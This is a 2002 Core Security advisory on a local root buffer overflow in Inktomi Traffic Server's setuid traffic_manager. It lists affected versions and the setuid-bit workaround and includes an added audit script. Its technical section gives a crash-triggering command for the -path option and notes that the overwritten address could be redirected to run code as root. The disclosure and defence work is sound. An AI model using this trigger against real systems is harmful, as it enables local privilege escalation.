Vulnerability Report For Inktomi Traffic Server

Advisory ID Internal: CORE-220620

Bugtraq ID: 5098

CVE Name: CVE-2002-1013

Title: Inktomi Traffic Server traffic_manager local overflow.

Class: Boundary error condition (buffer overflow)

Remotely Exploitable: NO

Locally Exploitable: YES

Vendors contacted:
Inktomi Corporation (INKT)
. Initial email sent: 2002-06-21
. Acknowledged reception of initial contact: 2002-06-24
. Official response and fix information: 2002-07-01

Release mode: COORDINATED RELEASE


Vulnerability Description

Inktomi's Traffic Server product provides transparent web caching, access control and content filtering. It is available for Linux, Solaris and Windows platforms. A vulnerability that could allow a local attacker to gain root access has been discovered in the Unix version of the software.


Problem: Buffer overflow in traffic_manager executable

The traffic_manager executable is used to manage Traffic Server. It is installed setuid-root by default under the [installpath]/bin directory.
When traffic_manager is executed with a long command line argument, a buffer overflow occurs.
This vulnerability can be exploited locally to gain root access.

A local exploit module is available for CORE IMPACT customers in the July 2002 update pack.


Vulnerable Packages/Systems

The local root vulnerability in traffic_manager exists in all current and previous revisions of Inktomi Traffic Server, Traffic Edge and Media-IXT.

Current product revisions are:
Media-IXT 3.0.4
Traffic Server / Media-IXT 4.0.18
Traffic Server / Media-IXT 4.0.20
Traffic Server / Media-IXT 5.1.3
Traffic Server / Media-IXT 5.2.0-R
Traffic Server / Media-IXT 5.2.1
Traffic Server / Media-IXT 5.2.2
Traffic Edge 1.1.2 (Traffic Server 5.2.1)
Traffic Edge 1.5.0 (Traffic Server 5.5)


Solution/Vendor Information/Workaround

The buffer overflow error in the "-path" option of the traffic_manager command will be corrected to remove the vulnerability in all future maintenance releases of Traffic Server, Media-IXT and Traffic Edge.

The identified vulnerability applies to command-line execution of bin/traffic_manager, so the risk applies only to shell sessions already connected to the proxy host as non-privileged users. The vulnerability does not affect network services or access and cannot grant remote access to the proxy host.

If you wish to block this local vulnerability, remove the setuid bit from the traffic_manager executable. When traffic_manager is not setuid root, the proxy will not be able to directly serve 'privileged' port numbers less than 1024.

Some proxy configurations will require ARM config/ipnat.conf

Please refer to Inktomi's note on the bug at http://support.inktomi.com/kb/070202-003.html with specific instructions on how to reconfigure the products to operate properly without the SUID flag set on the binary.

Contact [email protected] for assistance
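
The workaround above, as an added example (not vendor or Core Security code): a POSIX shell function that checks the two traffic_manager paths that install.sh marks chmod 4755 and, when called with "fix", clears the setuid bit with chmod u-s. The function name, the "fix" argument and the status strings are assumptions of this example.

```sh
#!/bin/sh
# Added example, not vendor code. Function names and output format are
# assumptions; the two paths are the ones install.sh marks chmod 4755.

# audit_traffic_manager INSTALL_DIR [fix]
#   report (default): list each copy and whether its setuid bit is set
#   fix:              also clear the bit with chmod u-s
# Return status = number of copies still setuid afterwards (0 = clean).
audit_traffic_manager() {
    install_dir=$1
    action=${2:-report}
    remaining=0
    for bin in "$install_dir/bin/traffic_manager" \
               "$install_dir/bin/debug/traffic_manager"; do
        if [ -L "$bin" ]; then
            # chmod follows symlinks; make the operator look at the target.
            echo "symlink: $bin (check the target by hand)"
            continue
        fi
        if [ ! -f "$bin" ]; then
            echo "absent:  $bin"
            continue
        fi
        owner=$(ls -ldn "$bin" | awk '{print $3}')
        if [ ! -u "$bin" ]; then
            echo "ok:      $bin (uid $owner, no setuid bit)"
        elif [ "$action" = fix ] && chmod u-s "$bin" && [ ! -u "$bin" ]; then
            echo "fixed:   $bin (uid $owner, setuid bit cleared)"
        else
            echo "SETUID:  $bin (uid $owner)"
            remaining=$((remaining + 1))
        fi
    done
    return "$remaining"
}

# Run directly: sh audit.sh /path/to/install [fix]
if [ "$#" -gt 0 ]; then
    audit_traffic_manager "$@"
fi
```

A non-zero exit status in report mode means at least one copy is still setuid and can be used as a compliance check after upgrades or reinstalls, since install.sh sets the bit again.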


Credits

This vulnerability was discovered by the Security Consulting Services team at Core Security.

We would like to thank Warren Brown from Inktomi Product Support for the quick response to the issue.


Technical Description - Exploit/Concept Code

Traffic Manager installs the traffic_manager program as a root owned file with the set user id bit set.

Below are the lines from install.sh that make traffic_manager setuid-root.

----
# Adjust setuid commands
chown root ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
chmod 4755 ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
if [ -d ${InstallDir}/bin/debug ] ; then
    chown root ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
    chmod 4755 ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
fi

----
The overflow occurs when a string longer than 1700 bytes is passed as the argument to the -path option. Exploitability has been confirmed on the Solaris platform.

/inktomi/5.1.3/bin# ./traffic_manager -path `perl -e 'print "A"x1720'` <
[TrafficManager] ==> Kernel Sig 11; Reason: 1
[TrafficManager] ==> Cleaning up and reissuing signal #11
Abort(coredump)

truss output:
open64("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
fstat(3, 0xFFBEC130) = 0
time() = 1024660377
getpid() = 27458 [27457]
putmsg(3, 0xFFBEB7E8, 0xFFBEB7DC, 0) = 0
open("/var/run/syslog_door", O_RDONLY) Err#2 ENOENT
Incurred fault #5, FLTACCESS %pc = 0xFF0CF2E0
siginfo: SIGBUS BUS_ADRALN addr=0x41414149
Received signal #10, SIGBUS [caught]
siginfo: SIGBUS BUS_ADRALN addr=0x41414149

By replacing 0x41414141 with a valid stack address and building the right string, it is possible to execute arbitrary code with root privileges.


DISCLAIMER:

The contents of this advisory are copyright (c) 2002 CORE SECURITY TECHNOLOGIES
and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

$Id: InktomiTS-pathbof-advisory.txt,v 1.5 2002/07/02 21:11:40 iarce Exp $